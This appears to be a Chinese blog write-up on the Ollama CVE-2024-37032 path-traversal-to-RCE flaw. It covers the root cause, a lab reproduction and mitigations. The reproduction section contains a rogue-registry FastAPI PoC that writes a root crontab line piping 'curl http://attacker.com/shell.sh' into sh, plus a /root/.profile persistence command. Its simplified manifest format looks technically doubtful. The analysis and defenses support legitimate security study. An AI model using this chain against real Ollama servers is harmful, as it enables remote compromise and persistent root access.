当前位置: 首页 > news >正文

从路径遍历到RCE:深度剖析Ollama CVE-2024-37032漏洞原理与利用链

news 2026/5/12 11:06:17

1. Ollama与CVE-2024-37032漏洞背景

Ollama作为本地运行大型语言模型的工具链,近年来在开发者社区中迅速走红。它简化了从模型下载、配置到交互的全流程,甚至能让不懂机器学习原理的用户快速体验AI能力。但正是这种"开箱即用"的特性,使得其安全设计缺陷可能造成远超传统软件的危害范围。

2024年曝光的CVE-2024-37032漏洞之所以引发广泛关注,是因为它打破了容器化应用的安全边界。该漏洞本质上是清单文件解析逻辑缺陷路径遍历漏洞的危险组合,攻击者通过精心构造的digest字段,可以让服务端将恶意负载误认为合法的文件操作指令。我在复现环境时发现,当Ollama处理模型推送请求时,其校验逻辑存在致命漏洞——服务器仅检查了字段格式合规性,却未验证路径的真实合法性。

2. 漏洞技术原理深度解析

2.1 清单文件验证机制缺陷

Ollama采用类Docker的镜像分发架构,其核心危险点在于manifest.json文件的解析过程。正常流程中,digest字段应包含经SHA256校验的文件哈希值,但实际代码中却直接将其作为路径拼接参数。以下是漏洞触发的关键代码路径:

# 伪代码展示危险拼接逻辑 def process_manifest(manifest): target_path = os.path.join(BASE_DIR, manifest['config']['digest']) with open(target_path, 'wb') as f: # 未做路径规范化检查 f.write(manifest['layers'][0]['data'])

我在测试时构造了包含../../../../etc/passwd的digest值,系统竟直接将内容写入到绝对路径。这种低级失误在安全领域堪称"经典"——2014年Docker就修复过类似问题,没想到十年后同样错误会重现。

2.2 路径遍历到RCE的利用链

完整的攻击链需要分三步实现:

  1. 初始访问:通过API推送恶意模型(需开启insecure模式)
  2. 文件污染:利用路径遍历覆盖关键配置文件
  3. 权限升级:写入crontab或SSH authorized_keys实现RCE

实测中最有效的攻击方式是篡改/root/.ollama/models/manifests/下的索引文件。当服务下次加载模型时,会执行被污染的指令。例如我在PoC中注入的恶意命令:

# 通过写入.profile实现持久化攻击 echo "malicious_payload" >> /root/.profile

3. 漏洞复现实战指南

3.1 环境搭建注意事项

建议使用Docker快速搭建靶场环境,但需注意几个关键点:

  • 必须使用0.1.33及以下版本(漏洞版本)
  • 主机映射目录需设置写权限
  • 关闭SELinux等安全模块

具体启动命令应调整为:

docker run -v /tmp/ollama:/root/.ollama -p 11434:11434 --security-opt seccomp=unconfined ollama/ollama:0.1.33

3.2 分步攻击演示

  1. 启动恶意注册服务器

    # 修改自原始PoC的简化版本 from fastapi import FastAPI app = FastAPI() @app.get("/v2/attack/model/manifests/latest") async def evil_manifest(): return { "config": { "digest": "../../../../etc/crontab", "size": 100 }, "layers": [{ "mediaType": "application/octet-stream", "digest": "evil", "data": b"* * * * * root curl http://attacker.com/shell.sh | sh\n" }] }

  2. 触发模型拉取

    curl -X POST http://target:11434/api/pull -d '{"name":"attacker/model"}'

  3. 验证攻击效果: 等待1分钟后检查目标服务器的crontab是否被篡改。这种攻击方式在云原生环境中尤其危险,可能造成集群级沦陷。

4. 防御方案与最佳实践

4.1 官方修复方案分析

Ollama在0.1.34版本中引入了三重防护:

  1. 路径规范化检查(使用filepath.Clean)
  2. Digest字段格式严格校验(必须符合SHA256格式)
  3. 写操作白名单机制

但根据我的代码审计,仍存在潜在的绕过风险。建议用户额外采取以下措施:

4.2 纵深防御策略

  • 网络层:限制11434端口的访问IP范围
  • 系统层:为Ollama进程配置专用低权限用户
  • 运行时:启用AppArmor配置文件

以下是最小权限配置示例:

# AppArmor配置文件示例 /usr/bin/ollama { /root/.ollama/** rw, /etc/passwd deny, /etc/shadow deny, /var/spool/cron/** deny, network inet tcp, }

对于企业用户,建议在API网关层增加模型签名验证。我在某金融客户的生产环境中就部署了基于SPIFFE的身份认证体系,有效阻断了此类供应链攻击。

http://www.jsqmd.com/news/519155/

相关文章:

  • Wireshark网卡列表消失?5分钟搞定NPCAP驱动加载问题
  • 探索A*、JPS+算法在多机器人与单机器人场景下结合DWA的改进与对比
  • 基于三次多项式的机械臂轨迹优化与MATLAB实现
  • Win10蓝屏CRITICAL_PROCESS_DIED:从错误诊断到系统修复全流程解析
  • 【银河麒麟高级服务器操作系统】安全配置基线实战:从问题定位到参数调优的深度解析
  • Vue3 + Element Plus 表格查询规范:条件管理、分页联动 + 避坑,标准化写法|表单与表格规范篇
  • 基于MBD的电动汽车VCU应用层软件:从模型到实车的V流程实践
  • 三菱SLMP通讯协议在工业自动化中的高效数据交换实践
  • ESXi 7.0 + Ubuntu 22.04 保姆级配置:从虚拟机创建到SSH内网穿透全流程
  • simulink模型燃料电池空气路建模与控制 包括:燃料电池电堆模型(阴极,阳极,水传递
  • 图像检索技术选型实战指南:从理论到落地的全景解析
  • AGV-WCS调度系统参考源码 功能比较全面的AGV调度系统,源码+数据库+讲义; C#语言
  • 突破“黑盒”与数据瓶颈:物理信息神经网络(PINN)重构科学计算新范式
  • 嵌入式内存管理“潜规则”:从.data/.bss段搬运,看ld脚本如何影响启动速度和功耗
  • 20-基于模型预测控制的海洋机器人协同路径跟踪控制:多智能体一致性及事件触发通信(ETC)的M...
  • 【笔试真题】- 美团-2026.03.21-算法岗
  • 手机也能做PCB设计?这款Droid PCB APP让你随时随地搞定电路板布局
  • php方案 io_uring 与 PHP 读文件
  • 致命疏漏:CVE-2026-27944撕开Nginx UI防线,未授权泄露背后的安全警示
  • 论文降AI后怎么检查专业术语有没有被改?逐项检查清单分享 - 还在做实验的师兄
  • 智赋金融 筑路未来——AI银行的中国实践、全球格局与进化路径
  • 永磁同步电机滑模观测器的无感控制仿真探索
  • 操作系统——程序、进程、线程
  • php方案 Direct I/O(O_DIRECT)应用场景如何在 PHP 中通过 FFI 实现并处理扇区对齐限制?
  • 自动驾驶避坑指南:开放空间规划算法在自主泊车中的5大常见问题
  • 高危无认证XXE突袭!GeoServer CVE-2025-58360漏洞深度剖析与防御前瞻
  • 如何用Notepad++和UABE修改Unity游戏配置表?5分钟搞定json/excel数据编辑
  • RTOS工程实践:从裸机到可验证实时系统的三阶段跃迁
  • 遗传算法调参避坑指南:从51城TSP实验看种群大小与变异率的博弈
  • PC端Emby播放器新浪潮:Tsukimi领衔,femor、yamby等客户端功能深度解析与版本演进